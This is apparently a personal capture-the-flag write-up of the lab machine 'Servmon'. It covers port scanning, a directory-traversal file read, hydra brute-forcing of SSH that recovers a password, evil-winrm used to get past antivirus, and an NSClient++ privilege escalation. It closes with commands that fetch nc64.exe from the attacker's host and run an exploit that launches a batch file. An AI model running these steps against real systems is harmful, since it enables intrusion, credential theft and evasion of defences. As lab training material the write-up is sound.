Servmon
Personal Rating: Medium
Enumeration
sudo nmap -sV -sC -p- <IP>
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22 06:35PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_8.0 (protocol 2.0)
80/tcp open http
|_http-title: Site doesn't have a title (text/html).
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6063/tcp open tcpwrapped
6699/tcp open napster?
8443/tcp open ssl/https-alt
|_ssl-date: TLS randomness does not represent time
| http-title: NSClient++
|_Requested resource was /index.html
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| iday
| :Saturday
| workers
|_ jobs
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
That is a lot of output. It is clear that we have a Windows Server machine with an IIS based website.
21 ftp:


So there is some secure folder in Sharepoint for passwords
80 http:


The directory traversal is very simple: /../../../../../../../../../../../../windows/win.ini But it did not work.
feroxbuster -u
http://10.10.10.184/
-w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
#No results
8443 https:


feroxbuster -u
https://10.10.10.184:8443/
-w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -k
5666:
Likely NRPE (Nagios)
There are many Nagios exploits according to searchsploit. Maybe I can find out the version.
6699:
Possibly WinMX or napster
NVMS LFI
Possibly we can get the Passwords.txt file via the LFI that was mentioned in Confidential.txt eventhough it did not work at first.
The metasploit version of the exploit worked. But why?

This is what metasploit sent. After testing the same in the browser I saw that something removed my payload from the URL ;_;

The resulting file contained 7 passwords. I will try them all with nathan and nadine on ssh. Using hydra will make that faster:
hydra -L userlist.txt -P 20231211170419_default_10.10.10.184_nvms.traversal_767567.txt 10.10.10.184 ssh
Hydra (
https://github.com/vanhauser-thc/thc-hydra
) starting at 2023-12-11 17:08:57
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 28 login tries (l:4/p:7), ~2 tries per task
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184 login: nadine password: L1k3B1gBut7s@W0rk
[22][ssh] host: 10.10.10.184 login: Nadine password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 2 valid passwords found
Internal Enumeration
So I could log in with nadine. nadine has no special privileges:

I transferred winpeasx64.exe onto the host with a python webserver and wget in powershell and ran it.
It actually seems like Defender blocked WinPEAS:
Program 'winpeas.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted software
Access to the command systeminfo
is also denied.
Since evil-winrm has a built-in AMSI bypass, I will try that.
evil-winrm -i 10.10.10.184 -u nadine -p 'L1k3B1gBut7s@W0rk'
This did work. In โProgram Filesโ you can see โWindows Defender Advanced Threat Protectionโ.
This, which I found with searchsploit, might work: NSClient++ 0.5.2.35 - Privilege Escalation
According to the exploit entry, I can grab the Password from C:\Program Files\NSClient++\nsclient.ini:
password = ew2x6SsGTxjRwXOT
This also worked: .\nscp.exe web password --display
Lets see if it works for ssh with root. Nope. Also not for Nathan.
With the Python version I get a 403 and with the metasploit version I get that the admin password is wrong.
Privilege Escalation
Using scanner/ssh/ssh_login I could get a metasploit session with nadine:L1k3B1gBut7s@W0rk
I was about to set up dynamic port forwarding to the host, but using netstat -ano
I could see that I should be able to regularly access the application.
Watching Ippsecs video since I was stuck here I found out, that the only reason why I could not properly use the website at port 8443 was that it does only work with chromium ;_;
So this exploit should now be possible
/usr/share/exploitdb/exploits/windows/local/46802.txt
ew2x6SsGTxjRwXOT
Did not work, the page shows 403
The Python version of the exploit did not work either:

With a local port forwarding it worked, so it seems like the application is not accessible online
Now this one worked better but I did not get a shell: windows/http/nscp_authenticated_rce
It looks like I have to do the exploit manually to make it work.
This one seems to work with ssh local port forwarding set up, but nc.exe did not work as the file seems corrupted.
python3 exploit.py 'cmd.exe /c "C:\Users\Nadine\Documents\evil.bat"' https://127.0.0.1:8443 ew2x6SsGTxjRwXO

Another attempt:
wget
http://10.10.16.6:8000/nc64.exe
-UseBasicParsing -OutFile nc64.exe
Got it!

Last updated